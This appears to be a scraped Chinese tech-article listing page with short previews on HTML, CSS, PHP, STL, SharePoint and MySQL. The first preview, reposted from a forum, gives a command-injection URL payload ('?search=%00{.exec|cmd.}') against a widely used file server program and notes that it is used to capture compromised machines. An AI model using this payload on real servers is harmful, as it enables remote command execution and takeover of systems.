从某论坛看见的,转载部分: 这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。http://localhost:80/?search==%00{.exec|cmd.}http://localhost:80/search=%00{.exec|cmd.}注:有些版本search前面是没有?的。测试部分:...
分类:
其他好文 时间:
2014-09-15 12:55:38
阅读次数:
229
原始 demohtml 我是单行测试文字 我是多行文字我是多行文字是多行文字我是多行文字我是多行文字我是多行文字我是多行文字我是多行文字我是多行文字我是多行文字我是>多行文字我是多行文字 css .box{ border:1px ...
分类:
Web程序 时间:
2014-09-15 12:44:38
阅读次数:
286
HTML5 知识点(1)语义化标记 ,,,,,,,,,,(2)表单增强 ①新的INPUT类型: color, email, date, month, week, time, datetime, datetime-local, number, range, search, tel, url ②新属性:...
分类:
Web程序 时间:
2014-09-15 00:51:27
阅读次数:
303
Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.
You may assume no duplicates in the array....
分类:
其他好文 时间:
2014-09-14 22:10:17
阅读次数:
146
无疑是STL 中最大的一个头文件,它是由一大堆模板函数组成的。下面列举出中的模板函数:adjacent_find / binary_search / copy / copy_backward / count/ count_if / equal / equal_range / fill / fill_...
分类:
其他好文 时间:
2014-09-14 20:43:37
阅读次数:
280
安装php:yum -y install php重启httpd服务激活php:/etc/init.d/httpd restart测试php是否安装完成vim /var/www/html/info.php安装php的组件:搜索php组件:yum search php安装常用组件:yum -y inst...
分类:
Web程序 时间:
2014-09-14 17:59:47
阅读次数:
454
SharePoint 2013 search service 爬网错误诊断三则...
分类:
其他好文 时间:
2014-09-13 21:34:35
阅读次数:
218
Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in or...
分类:
其他好文 时间:
2014-09-13 20:01:05
阅读次数:
176
Working on customer case today I ran into interesting problem – query joining about 20 tables (thank you ORM by joining all tables connected with fore...
分类:
数据库 时间:
2014-09-13 17:17:05
阅读次数:
294
Learn From: http://blog.csdn.net/morley_wang/article/details/7859922strstr(string,search)strstr() 函数搜索一个字符串在另一个字符串中的第一次出现。该函数返回字符串的其余部分(从匹配点)。如果未找到所搜索...
分类:
Web程序 时间:
2014-09-13 11:53:55
阅读次数:
153